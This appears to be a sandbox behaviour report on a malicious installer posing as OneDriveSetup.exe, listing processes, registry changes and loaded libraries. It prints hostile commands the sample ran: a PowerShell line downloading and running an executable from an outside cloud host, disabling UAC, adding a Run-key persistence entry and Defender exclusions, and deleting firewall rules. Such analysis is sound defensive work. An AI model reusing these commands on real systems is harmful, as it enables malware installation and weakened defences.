                Source: C:\Windows\System32\drvinst.exe Mutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4284:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:528:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2964:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe Mutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.12.2_Log_
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2768:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mypg3syr.jg0.ps1
                Source: C:\Users\user\Desktop\OneDriveSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
                Source: OneDriveSetup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                Source: C:\Users\user\Desktop\OneDriveSetup.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\OneDriveSetup.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmp, bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: OneDriveSetup.exe Virustotal: Detection: 10%
                Source: OneDriveSetup.exe String found in binary or memory: alse</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>false</StopOnIdleEnd> <RestartOnIdle>false</Restart
                Source: OneDriveSetup.exe String found in binary or memory: y> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
                Source: Agghosts.exe String found in binary or memory: <!--StartFragment
                Source: unknown Process created: C:\Users\user\Desktop\OneDriveSetup.exe "C:\Users\user\Desktop\OneDriveSetup.exe"
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                Source: unknown Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                Source: unknown Process created: C:\Users\Public\Music\20250413054815\Agghosts.exe "C:\Users\Public\Music\20250413054815\Agghosts.exe"
                Source: C:\Users\user\Desktop\OneDriveSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OneDriveSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"
                Source: C:\Users\user\Desktop\OneDriveSetup.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
                Source: C:\Windows\System32\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Videos\bin.exe "C:\Users\Public\Videos\bin.exe"
                Source: unknown Process created: C:\Users\Public\Music\20250413054815\Agghosts.exe "C:\Users\Public\Music\20250413054815\Agghosts.exe"
                Source: C:\Users\Public\Videos\bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exe Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exe Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver"
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000118"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: opengl32.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oledlg.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: glu32.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
